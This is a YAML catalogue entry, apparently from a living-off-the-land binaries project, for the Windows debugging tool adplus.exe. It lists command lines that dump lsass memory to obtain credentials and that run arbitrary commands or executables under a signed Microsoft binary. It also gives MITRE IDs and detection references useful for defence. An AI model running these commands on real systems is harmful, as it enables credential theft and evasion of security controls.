---
Name: adplus.exe
Description: Debugging tool included with Windows Debugging Tools
Author: mr.d0x
Created: 2021-09-01
Commands:
  - Command: adplus.exe -hang -pn lsass.exe -o {PATH_ABSOLUTE:folder} -quiet
    Description: Creates a memory dump of the lsass process
    Usecase: Create memory dump and parse it offline
    Category: Dump
    Privileges: SYSTEM
    MitreID: T1003.001
    OperatingSystem: All Windows
  - Command: adplus.exe -c {PATH:.xml}
    Description: Execute arbitrary commands using adplus config file (see Resources section for a sample file).
    Usecase: Run commands under a trusted Microsoft signed binary
    Category: Execute
    Privileges: User
    MitreID: T1127
    OperatingSystem: All Windows
    Tags:
      - Execute: CMD
  - Command: adplus.exe -c {PATH:.xml}
    Description: Dump process memory using adplus config file (see Resources section for a sample file).
    Usecase: Run commands under a trusted Microsoft signed binary
    Category: Dump
    Privileges: SYSTEM
    MitreID: T1003.001
    OperatingSystem: All Windows
  - Command: adplus.exe -crash -o "{PATH_ABSOLUTE:folder}" -sc {PATH:.exe}
    Description: Execute arbitrary commands and binaries from the context of adplus. Note that providing an output directory via '-o' is required.
    Usecase: Run commands under a trusted Microsoft signed binary
    Category: Execute
    Privileges: User
    MitreID: T1127
    OperatingSystem: All windows
    Tags:
      - Execute: CMD
      - Execute: EXE
Full_Path:
  - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe
  - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\adplus.exe
Code_Sample:
  - Code: https://gist.github.com/nasbench/e34ca2cd90e3a845a558a102a4f607da
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml
  - IOC: As a Windows SDK binary, execution on a system may be suspicious
Resources:
  - Link: https://mrd0x.com/adplus-debugging-tool-lsass-dump/
  - Link: https://twitter.com/nas_bench/status/1534916659676422152
  - Link: https://twitter.com/nas_bench/status/1534915321856917506
Acknowledgement:
  - Person: mr.d0x
    Handle: '@mrd0x'
  - Person: Nasreddine Bencherchali
    Handle: '@nas_bench'
